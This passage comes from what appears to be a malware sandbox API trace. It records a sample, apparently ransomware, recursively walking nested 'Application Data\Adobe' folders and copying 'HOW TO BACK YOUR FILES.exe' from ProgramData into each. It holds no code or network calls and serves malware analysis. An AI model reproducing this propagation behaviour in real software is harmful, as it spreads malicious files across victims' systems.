Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" [0106.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32cfc8 | out: hHeap=0x2b0000) returned 1 [0106.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0106.594] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned 175 [0106.594] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" [0106.594] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.594] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.595] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.595] GetLastError () returned 0x0 [0106.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.596] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.596] CloseHandle (hObject=0x120) returned 1 [0106.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.596] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.596] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70bc3940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70bc3940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.596] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.596] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.596] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" [0106.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ca068 | out: hHeap=0x2b0000) returned 1 [0106.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0106.596] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned 184 [0106.596] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles" [0106.596] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.596] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\profiles\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.597] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.597] GetLastError () returned 0x0 [0106.597] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.597] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.597] CloseHandle (hObject=0x120) returned 1 [0106.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.597] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.598] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xce4463a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70cce2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70cce2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.598] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.598] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.598] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.598] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0106.598] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0106.598] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 177 [0106.598] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.598] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.598] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.599] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.599] GetLastError () returned 0x0 [0106.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.599] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.599] CloseHandle (hObject=0x120) returned 1 [0106.599] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.599] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.599] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.600] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.600] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.600] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.600] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0106.600] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0106.600] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 182 [0106.600] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.600] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.600] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.601] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.601] GetLastError () returned 0x0 [0106.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.601] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.601] CloseHandle (hObject=0x120) returned 1 [0106.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.601] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.601] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7103a280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x7103a280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.601] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.601] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.602] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.602] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ead30 | out: hHeap=0x2b0000) returned 1 [0106.602] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0106.602] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned 188 [0106.602] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.602] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.602] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.603] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.603] GetLastError () returned 0x0 [0106.603] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.603] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.603] CloseHandle (hObject=0x120) returned 1 [0106.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.603] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.603] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x710603e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x710603e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.603] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.603] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.604] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0106.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0106.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7808 | out: hHeap=0x2b0000) returned 1 [0106.604] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned 152 [0106.604] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0106.604] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.604] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.604] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.605] GetLastError () returned 0x0 [0106.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.605] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.605] CloseHandle (hObject=0x120) returned 1 [0106.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.605] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.605] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.605] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.605] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.605] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" [0106.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0106.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0106.605] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned 158 [0106.605] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color" [0106.605] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.606] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\color\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.606] CreateFileW 